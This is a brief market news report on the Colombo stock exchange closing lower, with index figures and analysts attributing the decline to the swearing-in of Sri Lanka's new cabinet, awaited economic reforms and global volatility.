Colombo equities wrapped up in red; awaiting proper economic reforms

Friday's equities in Colombo wrapped up in red, in lackluster trade amidst the swearing of Sri Lanka’s New Cabinet, with analysts saying that investors  are awaiting till proper economic reforms are put forward. Also the market reacted to the persistent volatility  in the global equities as the emerging currencies weakened, analysts added. The All Share was down by 0.42 per cent to close at 7,215.11. This was mainly due to price losses in counters such as CTC. The S&P Index also slumped further by 21.01 points or -0.53 per cent to close at 3,957.83.
